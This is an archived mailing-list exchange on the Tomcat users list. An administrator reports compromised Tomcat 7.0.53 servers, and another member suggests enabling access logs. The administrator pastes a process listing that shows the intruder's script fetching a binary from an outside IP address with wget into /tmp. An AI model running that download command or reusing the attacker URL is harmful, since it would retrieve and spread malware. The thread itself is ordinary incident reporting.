Re: Regarding i think an intrusion

Tue, 29 Apr 2014 13:42:13 -0700 

Hello Dan,

Nop, the attacker is executing locally the following

tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid

And the launch squid who tries to connect via ssh to varoius places.

Right now its time to leave the office, but in a few hours i will paste in
pastebin access logs, config files, wherever you tell me.

This is my pstree

[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
     ├─atop
     ├─crond
     ├─dbus-daemon
     ├─events/0
     ├─events/1
     ├─events/2
     ├─events/3
     ├─httpd───8*[httpd]
     ├─irqbalance
     ├─2*[iscsid]
     ├─iscsiuio───3*[{iscsiuio}]
     ├─java─┬─sh───wget
     │      └─263*[{java}]
     ├─khelper

By the way, logfiles are really big, 200 mb each one, ill try to set up a
dropbox account so i can share it.

Thanks and regards

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dmik...@gopivotal.com>:

> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <
> lsantagost...@gmail.com> wrote:
>
> > Hello list,
> >
> > Im facing an issue in 6 tomcat server that are getting penetrated and
> they
> > are executing malicious scripts on my server.
>
> Can you share more about what they are doing?  It might give some clues as
> to how they are accessing your machines.  For example, if they are
> deploying a WAR file to your server, it could mean that they have access to
> the Manager application on your server.
>
> Any details you can share, might be helpful.
>
> > Im using 7.0.53 on my servers. Running Centos 5.8
> >
> > Let me know what information you need.
>
> Do you have an access log?  If not, enable one.  If the attacker is not
> deleting it, it could show you more about who they are and what requests
> they are executing to access your server.  Assuming they are entering
> through your application and not some other way.
>
> Dan
>
> >
> > PS: This is my first mail to this list, so i apologize for this not
> gentle
> > presentation.
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Reply via email to